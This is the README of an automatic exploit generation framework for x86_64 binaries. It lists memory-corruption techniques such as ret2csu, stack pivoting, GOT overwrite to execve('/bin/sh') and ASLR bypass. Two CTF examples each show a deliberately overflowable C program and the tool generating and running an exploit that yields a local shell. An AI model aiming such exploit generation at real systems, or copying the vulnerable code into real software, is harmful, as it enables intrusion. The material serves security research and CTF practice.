Modularized exploit generation framework for x86_64 binaries

Overview

This project is still at early stage of development, so you might want to come back later...

Requiem is a modularized exploit generator for x86_64 binaries which emulates the target program with Qiling, and uses the user-provided PoC as the target program's input. During the target program's execution, Requiem monitors its I/O-related behaviors and employs taint analysis to collect information that can be later used for exploitation.

To use Requiem, a PoC must be provided because Requiem cannot perform symbolic execution. The target program will follow the execution path formed by the PoC, and when the target program reaches the crash state, Requiem will determine whether the crash state is exploitable by checking if RIP has been tainted.

If RIP has been tainted at the crash state, Requiem will generate an exploit which:

• guides the target program to the exploitable state
• exploits the program based on the strategy specified by the user.

Modularized?

Def: An exploitation "strategy" consists of a list of exploitation "techniques".

The idea is to implement some well-known exploitation techniqes as reusable and configurable "modules". The user can use the built-in techniques to exploit a x86_64 binary, or write a custom strategy/techniques to deal with Ad-hoc problems.

Implemented Techniques

• ret2win (return to an arbitrary function specified by the user)
• ret2csu (handling of different variants of __libc_csu_init is not implemented yet)
• basic stack pivot (read(0, bss+n, 1024), pop rbp ; ret, leave ret)
• advanced stack pivot (requires at least one call site of read())
• GOT partial overwrite (overwrite LSB of read@GOT to acquire syscall, then sys_execve("/bin/sh", 0, 0))
• mprotect + shellcode
• ret2dlresolve
• simple ASLR bypass (leak PIE/libc base addresses using available read primitives)
• advanced ASLR bypass (leak PIE/libc base addresses with _IO_file_write when there are no read primitives)
• ...

Implemented PoC Types

• stdin
• file
• socket
• ...

Dependencies

• Python 3.9.6
• qiling
• ROPgadget

Installation

git clone https://github.com/aesophor/requiem
cd requiem
git submodule update --init --recursive

Examples

1. pwnable.tw: unexploitable (500 PTS)

The original challenge is on pwnable.kr and it is solvable.
This time we fix the vulnerability and now we promise that the service is unexploitable.

source

#include <stdio.h>
#include <unistd.h>

int main() {
    sleep(3);
    char buf[4];
    read(0, buf, 256);
}

checksec

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

result

$ ./requiem.py 'examples/unexploitable/unexploitable' 'examples/unexploitable/poc' --exec
--- Requiem: Modularized Exploit Generation Framework ---
Developed by: Marco Wang <[email protected]>

(skipped a few lines)

[x]    Error: PC(0x4141414141414141) Unreachable
[x]    RIP tainted. Generating exploit...
[=]    Generating exploit...
[=]    Deduced offset: 4 bytes
write primitives: [[4198745, 140737488412076, 256]]
write primitives: [[4198745, 140737488412076, 256]]
[=]    Generated exploit: examples/unexploitable/unexploitable_exploit.py
[=]    Executing exploit: examples/unexploitable/unexploitable_exploit.py
================================================================================
[+] Starting local process '/home/aesophor/Code/requiem/examples/unexploitable/unexploitable': pid 402588
[*] Switching to interactive mode
$ ls
README.md  examples  libs  requiem  requiem.py
$

2. CS 2017 Fall: readme

The length of stack-buffer overflow is very limited.
Only the saved RBP and the return address is controllable by the attacker.

source

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    char buf[0x20];
    setvbuf(stdout, 0, _IONBF, 0);
    printf("overflow me:");
    read(0, buf, 0x30);
}

checksec

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

result

$ ./requiem.py 'examples/readme/readme' 'examples/readme/poc' --exec
--- Requiem: Modularized Exploit Generation Framework ---
Developed by: Marco Wang <[email protected]>

(skipped a few lines)

[x]    Error: PC(0x4141414141414141) Unreachable
[x]    RIP tainted. Generating exploit...
[=]    Generating exploit...
[=]    Deduced offset: 32 bytes
write primitives: [[4198801, 140737488412064, 48]]
write primitives: [[4198801, 140737488412064, 48]]
[=]    Generated exploit: examples/readme/readme_exploit.py
[=]    Executing exploit: examples/readme/readme_exploit.py
================================================================================
[+] Starting local process '/home/aesophor/Code/requiem/examples/readme/readme': pid 402513
[*] Switching to interactive mode
overflow me:$ ls
README.md  examples  libs  requiem  requiem.py
$